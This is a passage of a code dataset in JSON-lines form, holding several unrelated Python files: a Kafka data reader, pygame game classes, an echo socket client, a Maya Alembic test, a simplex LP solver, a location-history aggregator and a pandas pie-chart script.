message from kafka, send _stop_ message. no_message_count={},stop_count={},stopFlagNum={}\".format(\n no_message_count, stop_count, internal_system_param[\"stopFlagNum\"]))\n sys.stdout.flush()\n break\n finally:\n consumer.close()\n\n def _read_data(max_records=64, consume_threads=1, print_consume_time=False):\n\n def asyn_produce(consume_threads=1):\n print(\"asyn_produce start consuming\")\n x = 0\n while x < consume_threads:\n x += 1\n process = multiprocessing.Process(target=from_kafka, args=({\"max_records\": max_records}, mgr))\n process.start()\n\n def sync_produce(consume_threads=1):\n import threading\n x = 0\n while x < consume_threads:\n x += 1\n print(\"sync_produce start consuming\")\n threading.Thread(target=from_kafka, args=({\"max_records\": max_records}, mgr)).start()\n\n if \"useThread\" in systemParam:\n sync_produce(consume_threads=consume_threads)\n else:\n asyn_produce(consume_threads=consume_threads)\n\n print(\"start consuming from queue\")\n queue = mgr.get_queue(\"input\")\n\n def now_time():\n return int(round(time.time() * 1000))\n\n leave_msg_group = []\n total_wait_count = 0\n while True:\n msg_group = []\n count = 0\n should_break = False\n\n if print_consume_time:\n start_time = now_time()\n wait_count = 0\n while count < max_records:\n if queue.empty():\n wait_count += 1\n total_wait_count += 1\n items = queue.get(block=True)\n if items[-1] == \"_stop_\":\n should_break = True\n break\n items = items + leave_msg_group\n leave_msg_group = []\n items_size = len(items)\n\n if items_size == max_records:\n msg_group = items\n break\n if items_size > max_records:\n msg_group = items[0:max_records]\n leave_msg_group = items[max_records:items_size]\n break\n if items_size < max_records:\n leave_msg_group = leave_msg_group + items\n count += 1\n\n if len(leave_msg_group) > 0:\n msg_group = leave_msg_group\n\n if wait_count > 1 and total_wait_count < 11:\n print(\"queue get blocked count:{} when batch size is:{} actually size is {}\".format(wait_count,\n max_records,\n len(msg_group)))\n if total_wait_count == 10:\n print(\"already print too many blocked count(maybe kafka is busy)\")\n\n if print_consume_time:\n ms = now_time() - start_time\n print(\"queue fetch {} consume:{}\".format(max_records, ms))\n sys.stdout.flush()\n yield msg_group\n if should_break:\n print(\"_stop_ msg received, All data consumed.\")\n break\n queue.task_done()\n\n return _read_data\n\n\ndef params():\n return _params\n\n\ndef sklearn_configure_params(clf):\n fitParams = params()[\"fitParam\"]\n\n def t(v, convert_v):\n if type(v) == float:\n return float(convert_v)\n elif type(v) == int:\n return int(convert_v)\n elif type(v) == list:\n if type(v[0]) == int:\n return [int(i) for i in v]\n if type(v[0]) == float:\n return [float(i) for i in v]\n return v\n else:\n return convert_v\n\n for name in clf.get_params():\n if name in fitParams:\n dv = clf.get_params()[name]\n setattr(clf, name, t(dv, fitParams[name]))\n\n\ndef sklearn_all_data():\n rd = read_data()\n fitParams = params()[\"fitParam\"]\n X = []\n y = []\n x_name = fitParams[\"inputCol\"] if \"inputCol\" in fitParams else \"features\"\n y_name = fitParams[\"label\"] if \"label\" in fitParams else \"label\"\n debug = \"debug\" in fitParams and bool(fitParams[\"debug\"])\n counter = 0\n for items in rd(max_records=1000):\n item_size = len(items)\n if debug:\n counter += item_size\n print(\"{} collect data from kafka:{}\".format(fitParams[\"alg\"], counter))\n if item_size == 0:\n continue\n X = X + [item[x_name].toArray() for item 
in items]\n        y = y + [item[y_name] for item in items]\n    return X, y\n\n\ndef _get_param(p, name, default_value):\n    return p[name] if name in p else default_value\n\n\ndef get_param(p, name, default_value):\n    return _get_param(p, name, default_value)\n\n\ndef get_validate_data():\n    X = []\n    y = []\n    fitParams = params()[\"fitParam\"]\n    x_name = fitParams[\"inputCol\"] if \"inputCol\" in fitParams else \"features\"\n    y_name = fitParams[\"label\"] if \"label\" in fitParams else \"label\"\n    for item in validate_data:\n        X.append(item[x_name].toArray())\n        y.append(item[y_name])\n    return X, y\n\n\ndef sklearn_batch_data(fn):\n    rd = read_data()\n    fitParams = params()[\"fitParam\"]\n    batch_size = int(_get_param(fitParams, \"batchSize\", 1000))\n    label_size = int(_get_param(fitParams, \"labelSize\", -1))\n    x_name = _get_param(fitParams, \"inputCol\", \"features\")\n    y_name = _get_param(fitParams, \"label\", \"label\")\n    for items in rd(max_records=batch_size):\n        if len(items) == 0:\n            continue\n        X = [item[x_name].toArray() for item in items]\n        y = [item[y_name] for item in items]\n        fn(X, y, label_size)\n","sub_path":"streamingpro-mlsql/src/main/resources-online/python/mlsql.py","file_name":"mlsql.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"291639193","text":"import pygame\nimport random\nimport string\n\nfrom core.state.state import State\nfrom core.ui.state.ui_state import UIState\n\n\nclass GameObject:\n    \"\"\"\n    Mixes the component pattern with the state pattern\n    \"\"\"\n    def __init__(self, x, y, z=0):\n        self.surface = pygame.Surface((0, 0))\n        self.id = ''.join(random.sample(string.ascii_letters, 10))\n\n        self.parent = None\n        self.children = []\n\n        self.res_info = None\n\n        self.x = x  # anchor point X of the GameObject\n        self.y = y  # anchor point Y of the GameObject\n        self.z = z  # Z-order of the GameObject\n        self.z_index = 0\n\n        self.state = None\n\n        self.inited = False\n        self.ready = False\n\n    def handle_event(self, event):\n        self.state.handle_event(event)\n\n    def early_update(self, context):\n        if self.inited:\n            self.state.early_update(context)\n\n    def update(self, context):\n        if self.inited:\n            self.state.update(context)\n\n    def late_update(self, context):\n        if self.inited:\n            self.state.late_update(context)\n\n    def draw(self, screen):\n        if self.ready:\n            self.state.draw(screen)\n\n    def late_draw(self, screen):\n        if self.ready:\n            self.state.late_draw(screen)\n\n    def get_xy(self):\n        return self.x, self.y\n\n    def init_state(self, state):\n        if isinstance(state, State) or isinstance(state, UIState):  # if it is a State instance\n            self.state = state\n            self.state.register(self)\n            self.state.enter()\n\n    def changing_state(self, next_state, context=None, force=False):\n        if not force and isinstance(next_state, type(self.state)):\n            return\n        self.state.exit()\n        self.init_state(next_state)\n        if context:\n            self.state.update(context)\n\n    def add_child(self, child):\n        child.parent = self\n        while hasattr(self, child.id):  # if the child id already exists on self, re-randomize it\n            child.id = ''.join(random.sample(string.ascii_letters, 10))\n        self.__setattr__(child.id, child)\n        child.z = self.z_index\n        self.z_index += 1\n        self.children.append(child)\n\n    def destroy(self):\n        for child in self.children:\n            child.destroy()\n        self.children = []\n\n        self.state.destroy()\n        self.state = None\n\n        if self.parent:\n            i = 0\n            for me_or_brothers in self.parent.children:\n                if me_or_brothers.id == self.id:\n                    break\n                i += 1\n            del self.parent.children[i]\n            self.parent.__delattr__(self.id)\n            self.parent = None\n\n        self.surface = None\n\n    def 
empty_children(self):\n        self.children.clear()\n","sub_path":"core/entity/game_object.py","file_name":"game_object.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"201663343","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: echoClient.py\n@time: 2020/11/30 2:18 PM\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: \n\"\"\"\nimport socket\n\n\nclass Client(object):\n\n    def __init__(self, address, port):\n        self.address = address\n        self.port = port\n\n        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.sock.connect((self.address, self.port))\n\n    def send(self, message):\n        self.sock.sendall(message.encode())\n\n    def receive(self):\n        data = self.sock.recv(1024)\n        return data.decode('utf-8')\n\n    def close(self):\n        self.sock.close()\n\n\ndef my_client(address, port):\n    client = Client(address, port)\n    while True:\n        message = input(\"Input >\")\n\n        if message == 'exit':\n            client.send(message)\n            break\n\n        client.send(message)\n        info = client.receive()\n        print(info)\n\n    client.close()\n\n\nif __name__ == '__main__':\n    my_client(\"127.0.0.1\", 8888)\n","sub_path":"week02/echo/echoClient.py","file_name":"echoClient.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"517331185","text":"##-*****************************************************************************\n##\n## Copyright (c) 2009-2011,\n##  Sony Pictures Imageworks, Inc. and\n##  Industrial Light & Magic, a division of Lucasfilm Entertainment Company Ltd.\n##\n## All rights reserved.\n##\n## Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n## *       Redistributions of source code must retain the above copyright\n## notice, this list of conditions and the following disclaimer.\n## *       Redistributions in binary form must reproduce the above\n## copyright notice, this list of conditions and the following disclaimer\n## in the documentation and/or other materials provided with the\n## distribution.\n## *       Neither the name of Sony Pictures Imageworks, nor\n## Industrial Light & Magic nor the names of their contributors may be used\n## to endorse or promote products derived from this software without specific\n## prior written permission.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n##\n##-*****************************************************************************\n\nfrom maya import cmds as MayaCmds\nimport os\nimport unittest\nimport util\n\ndef makeRobot():\n MayaCmds.polyCube(name=\"head\")\n MayaCmds.move(0, 4, 0, r=1)\n\n MayaCmds.polyCube(name=\"chest\")\n MayaCmds.scale(2, 2.5, 1)\n MayaCmds.move(0, 2, 0, r=1)\n MayaCmds.polyCube(name=\"leftArm\")\n MayaCmds.move(0, 3, 0, r=1)\n MayaCmds.scale(2, 0.5, 1, r=1)\n MayaCmds.duplicate(name=\"rightArm\")\n MayaCmds.select(\"leftArm\")\n MayaCmds.move(1.25, 0, 0, r=1)\n MayaCmds.rotate(0, 0, 32, r=1, os=1)\n MayaCmds.select(\"rightArm\")\n MayaCmds.move(-1.25, 0, 0, r=1)\n MayaCmds.rotate(0, 0, -32, r=1, os=1)\n MayaCmds.select(\"rightArm\", \"leftArm\", \"chest\", r=1)\n MayaCmds.group(name=\"body\")\n\n MayaCmds.polyCube(name=\"bottom\")\n MayaCmds.scale(2, 0.5, 1)\n MayaCmds.move(0, 0.5, 0, r=1)\n MayaCmds.polyCube(name=\"leftLeg\")\n MayaCmds.scale(0.65, 2.8, 1, r=1)\n MayaCmds.move(-0.5, -1, 0, r=1)\n MayaCmds.duplicate(name=\"rightLeg\")\n MayaCmds.move(1, 0, 0, r=1)\n MayaCmds.select(\"rightLeg\", \"leftLeg\", \"bottom\", r=1)\n MayaCmds.group(name=\"lower\")\n\n MayaCmds.select(\"head\", \"body\", \"lower\", r=1)\n MayaCmds.group(name=\"robot\")\n\nclass selectionTest(unittest.TestCase):\n\n def setUp(self):\n MayaCmds.file(new=True, force=True)\n self.__files = []\n\n def tearDown(self):\n for f in self.__files:\n os.remove(f)\n\n def testWriteMultipleRoots(self):\n\n makeRobot()\n MayaCmds.duplicate(\"robot\", name=\"dupRobot\")\n self.__files.append(util.expandFileName('writeMultipleRootsTest.abc'))\n MayaCmds.AbcExport(j='-root dupRobot -root head -root lower -root chest -file ' + self.__files[-1])\n\n MayaCmds.AbcImport(self.__files[-1], m='open')\n self.failUnless(MayaCmds.objExists(\"dupRobot\"))\n self.failUnless(MayaCmds.objExists(\"head\"))\n self.failUnless(MayaCmds.objExists(\"lower\"))\n self.failUnless(MayaCmds.objExists(\"chest\"))\n\n self.failIf(MayaCmds.objExists(\"robot\"))\n self.failIf(MayaCmds.objExists(\"robot|body\"))\n","sub_path":"Engine/Plugins/Experimental/AlembicImporter/Source/ThirdParty/Alembic/alembic/maya/Tests/AbcExport_writeMultipleRoots.py","file_name":"AbcExport_writeMultipleRoots.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638629842","text":"import numpy as np\n\n# or-tools convention\nstatus2str = [\"OPTIMAL\", \"FEASIBLE\", \"INFEASIBLE\", \"UNBOUNDED\", \n \"ABNORMAL\", \"MODEL_INVALID\", \"NOT_SOLVED\"]\n\ndebug = False\ndef dbg(s0, *s):\n if debug:\n print(s0, *s)\n\ndef pivot(T, pc, pr):\n #print(\"pc:\", pc, \"pr:\", pr)\n pe = T[pr, pc] # pivot element\n pivot_row = T[pr, :] * 1.0 # stupid numpy copy gotcha\n pivot_row /= pe\n offset = np.dot(T[:, pc].reshape([-1, 1]), pivot_row.reshape([1, -1]))\n T -= offset\n T[pr, :] = pivot_row\n return T\n\n\ndef select_pivot_column(z):\n \"\"\"\n Pick one variable that increases the 
objective\n \"\"\"\n\n for i, zi in enumerate(z):\n if zi > 0:\n return i + 1\n else:\n return None\n\n\ndef select_pivot_row(Tc, b):\n \"\"\"\n Which ceiling are we going to hit our head in first?\n \"\"\"\n\n #print(Tc)\n if all(Tc <= 0): # no roof over our head - to the stars!\n return None\n\n ratios = [bi / Tci if Tci > 0 else np.inf for Tci, bi in zip(Tc, b)]\n #print(\"ratios:\", ratios)\n return np.argmin(ratios) + 1\n\n\ndef collect_solution(T, basic):\n num_slack = len(basic)\n num_vars = len(T[0]) - num_slack - 2\n b = T[1:, -1]\n\n solution = np.zeros([num_vars])\n\n for pr, pc in enumerate(basic):\n if pc <= num_slack: # is a slack variable\n continue\n\n solution[pc - num_slack - 1] = T[pr + 1, -1] / T[pr + 1, pc]\n\n return solution\n\n\ndef phase2(A, b, c):\n \"\"\"\n maximize c * x \n such that\n Ax <= b\n x >= 0\n b >= 0\n \"\"\"\n\n # build a tableau T\n #T = [1 -c 0 0;\n # 0 A I b]\n # where I corresponds to s, slack variables\n\n # Loop, terminate when no pivot column can be selected\n\n # select pivot column\n # given pivot column, select pivot row\n # given pivot element, perform pivot operation\n\n # need to keep track of:\n # which variables are basic\n\n # returning the solution: identify basic variables among original variables\n # set nonbasic variables to 0\n\n num_slack, num_vars = A.shape\n z_s0 = np.zeros([num_slack])\n z_s1 = np.zeros([num_slack, 1])\n\n T1 = np.hstack([np.array([1]), z_s0, c, np.array([0])])\n T2 = np.hstack([z_s1, np.eye(num_slack), A, b])\n T = np.vstack([T1, T2])\n\n #dbg(T)\n\n basic = list(range(num_slack))\n\n while True:\n pc = select_pivot_column(T[0, 1:])\n if pc is None: # found optimum\n break\n #print(\"pc:\", pc)\n\n pr = select_pivot_row(T[1:, pc], T[1:, -1])\n if pr is None: # unbounded\n return None, np.inf\n #print(\"pr:\", pr)\n\n T = pivot(T, pc, pr)\n #print(T)\n\n basic[pr - 1] = pc\n\n return collect_solution(T, basic), -T[0, -1]\n\ndef phase1(A, b, c):\n \"\"\"\n find a feasible solution to \n Ax <= b\n x >= 0\n \"\"\"\n\n num_constr, num_vars = A.shape\n I = np.eye(num_constr)\n\n c_ext = np.concatenate([np.zeros([num_vars]), -1 * np.ones([num_constr])])\n A_ext = np.hstack([A, -I])\n z_init = -b * (b < 0)\n dbg(\"z_init:\\n\", z_init)\n x_relaxed = np.concatenate([np.zeros([num_vars, 1]), z_init])\n dbg(\"x_relaxed:\\n\", x_relaxed)\n A_prim, b_prim, c_prim, d_prim = phase1_5(A_ext, b, c_ext, x_relaxed)\n #c_prim[-len(c_prim) // 2:] = 0\n dbg(\"A_prim:\\n\", A_prim)\n dbg(\"b_prim:\\n\", b_prim)\n dbg(\"c_prim:\\n\", c_prim)\n dbg(\"d_prim:\\n\", d_prim)\n\n x_bfs, val = phase2(A_prim, b_prim, c_prim)\n\n dbg(\"x_bfs:\", x_bfs, \"val:\", val, \"d:\", d_prim)\n #exit(0)\n\n # c_ext * [0 z] = c_prim * x_bfs + d_prim = val + d_prim\n\n tol = 1e-8\n if val + d_prim < -tol: # infeasible\n return None\n\n return x_bfs[:num_vars]\n\ndef phase1_5(A, b, c, x_bfs):\n \"\"\"\n Given a basic feasible solution x_bfs,\n perform variable substitution so that\n \n A'x' <= b'\n x' >= 0\n b' >= 0.\n\n Also transform c to c' and add constant d, \n to preserve optimum.\n\n A' = [A, -A;\n 0, I]\n b' = [b - A*x_bfs;\n x_bfs]\n c' = [c, -c]\n d = c*x_bfs.\n\n Effectively what we're doing is renaming\n\n x = x_positive - x_negative + x_bfs\n x_positive, x_negative >= 0\n where \n x >= 0 -> x_positive - x_negative + x_bfs ->\n -x_positive + x_negative <= x_bfs -> x_negative <= x_bfs\n\n also\n Ax <= b -> A(x_positive - x_negative + x_bfs) <= b ->\n [A, -A] * [x_positive; x_negative] <= b\n\n \"\"\" \n\n num_constr, num_vars = A.shape\n\n 
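# b' = b - A*x_bfs is the slack the feasible point x_bfs leaves in each original constraint\n    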
y_bfs = np.dot(A, x_bfs).reshape([-1, 1])\n    dbg(\"y_bfs:\", y_bfs)\n    b_prim = b - y_bfs\n    dbg(\"b_prim:\", b_prim)\n    b_prim = np.vstack([b_prim, x_bfs.reshape([-1, 1])])\n    dbg(\"b_prim:\", b_prim)\n\n    A_prim = np.hstack([A, -A])\n    I = np.eye(num_vars)\n    I_prim = np.hstack([-I, I])\n    A_prim = np.vstack([A_prim, I_prim])\n\n    c_prim = np.hstack([c, -c])\n    d = np.dot(c, x_bfs)\n\n    return A_prim, b_prim, c_prim, d\n\n\ndef lp(A, b, c):\n    \"\"\"\n    maximize c * x \n    such that\n    Ax <= b\n    x >= 0\n    \"\"\"\n\n    num_constr, num_vars = A.shape\n\n    x_bfs = phase1(A, b, c)\n    if x_bfs is None:\n        return None, None, 2 # infeasible\n\n    dbg(\"x_bfs:\", x_bfs)\n\n    dbg(\"b\", b)\n    A, b, c, d = phase1_5(A, b, c, x_bfs)\n    dbg(A)\n    dbg(b)\n    dbg(c)\n    dbg(d)\n\n    x_opt, val = phase2(A, b, c)\n    if x_opt is None:\n        return None, np.inf, 3 # unbounded\n\n    x_opt = x_opt[:num_vars] - x_opt[-num_vars:]\n    x_opt = x_opt + x_bfs\n    return x_opt, val, 0 # optimal\n\n\ndef main():\n    global debug\n    debug = False\n\n    all_tests = [\"basic\", \"basic_2\", \"basic_3\",\n                 \"basic_4\", \"basic_5\", \"basic_6\",\n                 \"infeasible\", \"infeasible_2\",\n                 \"unbounded\"]\n\n    test_cases = [\"basic_6\"]\n\n    if \"basic\" in test_cases:\n        A = np.array([[2, 1], [1, 2]])\n        b = np.array([[1], [1]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"basic_2\" in test_cases:\n        A = np.array([[2, 1], [1, 2], [4, 4]])\n        b = np.array([[1], [1], [1]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"basic_3\" in test_cases:\n        A = np.array([[2, 1], [1, 2], [-2, -2]])\n        b = np.array([[1], [1], [-1]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"basic_4\" in test_cases:\n        A = np.array([[3, 1], [1, 3], [2, 3]])\n        b = np.array([[1], [1], [1]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"basic_5\" in test_cases:\n        # this should take just two pivots\n        A = np.array([[-1, 1], [1, -1], [1, 1]])\n        b = np.array([[1], [1], [10000000]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"basic_6\" in test_cases:\n        A = np.array([[-1, 1], [1, -1], [1, 1]])\n        b = np.array([[1], [1], [1]])\n        c = np.array([1, 1])\n        print(\"Should be OPTIMAL\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n\n    if \"infeasible\" in test_cases:\n        A = np.array([[2, 1], [1, 2], [1, 1]])\n        b = np.array([[1], [1], [-1]])\n        c = np.array([1, 1])\n        print(\"Should be INFEASIBLE\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"infeasible_2\" in test_cases:\n        A = np.array([[2, 1], [1, 2], [-1, -1]])\n        b = np.array([[1], [1], [-1]])\n        c = np.array([1, 1])\n        print(\"Should be INFEASIBLE\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n    if \"unbounded\" in test_cases:\n        A = np.array([[-1, -1]])\n        b = np.array([[-1]])\n        c = np.array([1, 1])\n        print(\"Should be UNBOUNDED\")\n        x_opt, opt_val, status = lp(A, b, c)\n        print(x_opt, opt_val, status2str[status])\n\n\nif __name__ == '__main__':\n    
main()","sub_path":"garageofcode/simplex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67867247","text":"#!/usr/bin/python\n\nimport json, sys, math\nfrom math import sin, cos, sqrt, atan2, radians\nfrom exifParser import exifParse\n\n# Files\nfname = \"FilteredLocationHistory.json\"\noutName = 'aggregate.json'\nchapterFName = \"chapters.json\"\nimageMetadataFileName = \"image_metadata.json\"\nimg_dir = \"../../public/\" # Enter Directory of all images \n\n# Runtime constants\naggregateDistance = 1.0 # Aggregate locations less than 1 km apart\naggregateMinimum = 80 # Minimum of 80 data entries to keep\nfurtherAggregateDistance = 1.0 #Area aggregate\n\n# Points east of this median will be displayed west of the western hemisphere.\n# I want East Asia displayed across the Pacific :)\nflipMedianDegree = 50\n\n\n\n# CONSTANTS\nR = 6373.0 # approximate radius of earth in km\nDAY_MS = 86400000 # Day in milliseconds\nDEBUG = True\n\n# Math from https://stackoverflow.com/questions/19412462/getting-distance-between-two-points-based-on-latitude-longitude\n# Calculates the distance between two lat,lng points in kilometers. \n# Not quite accurate due to the Earth being a funny shape, but good enough for this.\ndef distanceKM(p1, p2):\n lat1 = radians(p1[\"lat\"])\n lon1 = radians(p1[\"lng\"])\n lat2 = radians(p2[\"lat\"])\n lon2 = radians(p2[\"lng\"])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n # That's some crazy math\n\n distance = R * c\n return distance \n\n\n# Combines a list of similar location data points into a single entry.\n# Result: the average lat/lng, as well as the time range these points cover.\ndef aggregateLocations(similar):\n if similar is None or len(similar) == 0:\n print(\"This wasn't supposed to happen\")\n return None\n\n latSum = 0\n lngSum = 0\n timeLow = int(similar[0][\"timestampMs\"])\n timeHigh = timeLow\n count = len(similar)\n\n for loc in similar:\n time = loc[\"date\"]\n latSum += loc[\"lat\"]\n lngSum += loc[\"lng\"]\n timeLow = min(timeLow, time)\n timeHigh = max(timeHigh, time)\n\n return {\n \"lat\": latSum / count,\n \"lng\": lngSum / count,\n \"timeStartMs\": timeLow,\n \"timeEndMs\": timeHigh,\n \"count\": count\n }\n\n# Aggregates consecutive entries if they are close enough.\n# Returns a new list of aggregated data.\ndef aggregateConsecutive(filtered):\n last = filtered[0]\n result = []\n similar = []\n\n for location in filtered:\n delta = distanceKM(location, last)\n\n if delta > aggregateDistance:\n # Starting a new location. 
If the old one had enough data points, save it.\n if len(similar) > aggregateMinimum:\n spot = aggregateLocations(similar)\n result.append(spot)\n similar = []\n\n similar.append(location)\n last = location\n\n # Return list from oldest to newest data\n result.reverse()\n return result\n\n\n# Combines two aggregate data points, expands time range to the min/max of both.\n# Returns a new dict\ndef combineResults(first, second):\n firstCount = first[\"count\"]\n secondCount = second[\"count\"]\n total = firstCount + secondCount\n\n avgLat = (first[\"lat\"] * firstCount + second[\"lat\"] * secondCount) / total\n avgLng = (first[\"lng\"] * firstCount + second[\"lng\"] * secondCount) / total\n\n return {\n \"lat\": avgLat,\n \"lng\": avgLng,\n \"timeStartMs\": min(first[\"timeStartMs\"], second[\"timeStartMs\"]),\n \"timeEndMs\": max(first[\"timeEndMs\"], second[\"timeEndMs\"]),\n \"count\": total\n }\n\n# Finds and combines data points that weren't consecutive, but are still close in location\n# IE two nights at a hostel become a single point.\n# input toggles for distance and time.\ndef aggregateFurther(data, distance, timeThreshold):\n result = []\n\n for index in range(len(data)):\n x = data[index]\n added = False\n\n # For each data point, compare it with ones we've already processed.\n for i in range(len(result)):\n y = result[i]\n\n # if we're close enough and within the given time range, combine and continue\n if not added and distanceKM(x, y) < distance and (abs(y[\"timeStartMs\"] - x[\"timeEndMs\"]) < timeThreshold or abs(x[\"timeStartMs\"] - y[\"timeEndMs\"]) < timeThreshold):\n result[i] = combineResults(x, y)\n added = True\n\n # If we didn't find something to add this data point to, add it individualy to results.\n if not added:\n result.append(x)\n\n return result\n\n# Rotating certain data points around the map.\ndef flipDataPoints(data):\n for entry in data:\n if entry[\"lng\"] > flipMedianDegree:\n entry[\"lng\"] -= 360\n\n\n# Reads in a chapter file, and organizes our data points into custom chapters.\ndef chapterGrouping(data):\n with open(chapterFName) as data_file: \n chapters = json.load(data_file)\n\n for chap in chapters:\n \n start = int(chap[\"start\"])\n end = int(chap[\"end\"])\n\n children = []\n\n for date in data:\n if date[\"timeStartMs\"] >= start and date[\"timeEndMs\"] <= end:\n children.append(date)\n chap[\"children\"] = children\n chap[\"images\"] = []\n\n return chapters\n\ndef addImageMetadata(data):\n images = exifParse(img_dir)\n \n if DEBUG: print(\"Images loaded %s\" % len(images))\n flipDataPoints(images)\n\n for image in images:\n timeStamp = image[\"timestamp\"]\n\n for chapter in data:\n if int(chapter[\"start\"]) <= timeStamp and timeStamp <= int(chapter[\"end\"]):\n chapter[\"images\"].append(image)\n\n # This adds image location data into the timeline. It looks neat for now but a little busy\n # And I don't think its completely necessary. 
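combineResults above weights each coordinate by the point's count, so merging a large cluster with a small one barely moves the large one. A hand-worked instance with made-up values, assuming the function from mapparser.py is in scope:

    a = {"lat": 10.0, "lng": 0.0, "timeStartMs": 100, "timeEndMs": 200, "count": 3}
    b = {"lat": 14.0, "lng": 4.0, "timeStartMs": 150, "timeEndMs": 400, "count": 1}
    merged = combineResults(a, b)
    # lat -> (10*3 + 14*1) / 4 = 11.0, lng -> (0*3 + 4*1) / 4 = 1.0
    # the time range widens to [100, 400] and count becomes 4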
Will review once I add more images into the data.\n for chapter in data:\n for image in chapter[\"images\"]:\n imageLoc = {\n \"lat\": image[\"lat\"],\n \"lng\": image[\"lng\"],\n \"timeStartMs\": image[\"timestamp\"],\n \"timeEndMs\": image[\"timestamp\"],\n \"count\": 1\n }\n chapter[\"children\"].append(imageLoc)\n chapter[\"children\"].sort(key=lambda x: x[\"timeEndMs\"], reverse=True)\n return data\n\n\n\ndef main():\n with open(fname) as data_file: \n data = json.load(data_file)\n if DEBUG: print(\"Input length %s\" % len(data))\n\n data = aggregateConsecutive(data)\n if DEBUG: print(\"Aggregated length %s\" % len(data))\n\n data = aggregateFurther(data, furtherAggregateDistance, DAY_MS)\n if DEBUG: print(\"Final length %s\" % len(data))\n\n flipDataPoints(data)\n\n data = chapterGrouping(data)\n if DEBUG: print(\"Chapter count %s\" % len(data))\n\n data = addImageMetadata(data)\n\n # TODO - Unique ID tag to everything\n # TODO - Curate Data. Further aggregate in specific locations (but keeping existing data in a list)\n # IE returning PARIS, but you can expand. Waiting until we start integrating photo info. \n # TODO - Blacklist of unwanted locations. Some personal, some random road trip data.\n # TODO - Blacklist Seattle? \n\n with open(outName, \"w\") as out_file:\n json.dump(data, out_file, indent=2)\n\nmain() ","sub_path":"src/scripts/mapparser.py","file_name":"mapparser.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57170911","text":"import pygame\r\nfrom enemy import Enemy\r\nimport random\r\nimport constants as c\r\n\r\n\r\nclass EnemySpawner:\r\n def __init__(self):\r\n self.enemy_group = pygame.sprite.Group()\r\n self.spawn_timer = random.randrange(30, 120)\r\n\r\n\r\n def update(self):\r\n self.enemy_group.update()\r\n for enemy in self.enemy_group:\r\n if enemy.rect.y >= c.DISPLAY_HEIGHT:\r\n self.enemy_group.remove(enemy)\r\n if self.spawn_timer == 0:\r\n self.spawn_enemy()\r\n self.spawn_timer = random.randrange(30, 120)\r\n else:\r\n self.spawn_timer = self.spawn_timer - 1\r\n\r\n def spawn_enemy(self):\r\n new_enemy = Enemy()\r\n self.enemy_group.add(new_enemy)","sub_path":"Galaga-Game/enemy_spawner.py","file_name":"enemy_spawner.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513320915","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndf = pd.read_csv('pandas/zamowienia.csv', header=0, delimiter=\";\")\r\ndf_np = np.array(df)\r\ndane = df.groupby(['Sprzedawca']).agg({\"idZamowienia\": [\"count\"]})\r\nExplode = [1/(i-0.1) for i in range(len(dane.index.values))]\r\nwedges, texts, autotexts = plt.pie(dane.values, explode=Explode, labels=dane.index.values,\r\n autopct=lambda pct: 